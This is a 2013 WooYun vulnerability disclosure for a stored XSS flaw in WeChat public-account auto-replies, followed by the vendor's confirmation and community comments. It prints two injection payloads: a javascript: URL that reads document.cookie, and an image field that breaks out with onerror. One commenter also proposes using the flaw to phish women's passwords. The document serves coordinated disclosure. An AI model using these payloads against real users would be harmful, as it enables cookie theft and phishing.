当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-021218

漏洞标题:微信执行远程js代码可攻击其它用户(可撒网可钓鱼)

相关厂商:腾讯

漏洞作者: blue

提交时间:2013-04-03 19:09

修复时间:2013-05-18 19:10

公开时间:2013-05-18 19:10

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2013-04-03: 细节已通知厂商并且等待厂商处理中
2013-04-07: 厂商已经确认,细节仅向厂商公开
2013-04-17: 细节向核心白帽子及相关领域专家公开
2013-04-27: 细节向普通白帽子公开
2013-05-07: 细节向实习白帽子公开
2013-05-18: 细节向公众公开

简要描述:

微信执行js代码,网页版和手机版均可。

详细说明:

微信公众账户启用开发模式后,自动回复给用户的内容可插入js代码(图文回复时,链接可输入javascript:js代码),网页版和手机版均能执行。
有两种方式,一种是在URL连接中输入伪协议跨站代码,另一种是在图片中利用事件执行XSS。

1:
$return[]=array(
                "title"=>"js",
                "url"=>"javascript:alert(document.cookie)"
            );
2:
$return[]=array(
                "title"=>"alert",
                "url"=>"1111",
                "pic" => '1" onerror=alert(1);//'
            );

漏洞证明:

1.png


2.png

修复方案:

你懂的。

版权声明:转载请注明来源 blue@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2013-04-07 14:45

厂商回复:

非常感谢您的报告。这个问题我们已经确认,正在与业务部门进行沟通制定解决方案。如有任何新的进展我们将会及时同步。

最新状态:

暂无

漏洞评价:

评论

  1. 2013-04-03 19:48 | VIP ( 普通白帽子 | Rank:759 漏洞数:100 )

    mark

  2. 2013-04-03 19:50 | 鬼魅羊羔 ( 普通白帽子 | Rank:299 漏洞数:41 | (#‵′)凸(#‵′)凸(#‵′)凸(#‵′)凸(#‵...)

    mark

  3. 2013-04-03 19:55 | iiiiiiiii ( 普通白帽子 | Rank:680 漏洞数:89 | )

    mark

  4. 2013-04-03 21:10 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:141 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    不解释 同楼上 mark

  5. 2013-04-03 21:26 | 点点 ( 普通白帽子 | Rank:214 漏洞数:38 | 准备申请سمَـَّوُوُحخ ̷̴̐...)

    看看

  6. 2013-04-03 21:48 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:170 | 力不从心)

    mark 网页版微信?

  7. 2013-04-03 21:53 | 淡漠天空 认证白帽子 ( 实习白帽子 | Rank:1113 漏洞数:141 | M:出售GOV STATE NSA CIA NASA DHS Symant...)

    @wefgod https://wx.qq.com/

  8. 2013-04-03 21:55 | jeffreys125 ( 实习白帽子 | Rank:63 漏洞数:14 | 懒人。。)

    刘明

  9. 2013-04-03 23:58 | gainover 认证白帽子 ( 核心白帽子 | Rank:1710 漏洞数:93 | PKAV技术宅社区! -- gainover| 工具猫网络-...)

    火前留名~~

  10. 2013-04-04 00:30 | NiceWorm ( 普通白帽子 | Rank:179 漏洞数:38 )

    mark

  11. 2013-04-04 11:47 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    下午到老祖宗墓前烧个iPhone5给他们,然后微信摇一摇,看看他们距离我多远,顺便测试下洞主这个XSS~~

  12. 2013-04-04 12:43 | 猥琐 ( 路人 | Rank:6 漏洞数:2 | 学习什么的最重要!)

    @心伤的瘦子 - -、祖宗那边不知道有没有安全响应中心

  13. 2013-04-04 14:20 | 心伤的瘦子 ( 普通白帽子 | Rank:147 漏洞数:21 | 严肃点~此号为虚拟小号,并不存在实体...)

    @猥琐 洞已撒下,坐等阎王上钩

  14. 2013-04-04 18:28 | blue 认证白帽子 ( 普通白帽子 | Rank:779 漏洞数:68 | 我心中有猛虎,细嗅蔷薇。)

    @心伤的瘦子 威武啊,膜拜一下

  15. 2013-04-04 21:13 | 小色 ( 路人 | Rank:0 漏洞数:1 | 撸的一手好管)

    mark

  16. 2013-04-05 11:32 | Z-0ne 认证白帽子 ( 普通白帽子 | Rank:559 漏洞数:38 | 目前专注于工控安全基础研究,工业数据采集...)

    关注

  17. 2013-04-06 03:33 | silmoon ( 路人 | Rank:26 漏洞数:3 | 熟悉Windows平台安全。)

    mark

  18. 2013-04-07 18:35 | VivenChen ( 路人 | Rank:8 漏洞数:1 | 平平淡淡过日子)

    mark

  19. 2013-04-26 17:08 | 八折 ( 实习白帽子 | Rank:40 漏洞数:12 | 我的作用不大,只能让你的坏心情打八折——...)

    关注~

  20. 2013-04-26 17:09 | 八折 ( 实习白帽子 | Rank:40 漏洞数:12 | 我的作用不大,只能让你的坏心情打八折——...)

    关注~

  21. 2013-05-07 16:12 | 低调 ( 实习白帽子 | Rank:42 漏洞数:18 | .......)

    这个要火!!!

  22. 2013-05-08 10:32 | Aqua ( 路人 | Rank:10 漏洞数:2 | hello world !)

    弄个钓鱼的搞妹子密码

  23. 2013-07-11 06:22 | skysheep ( 路人 | Rank:0 漏洞数:1 | 关注网络安全。)

    关注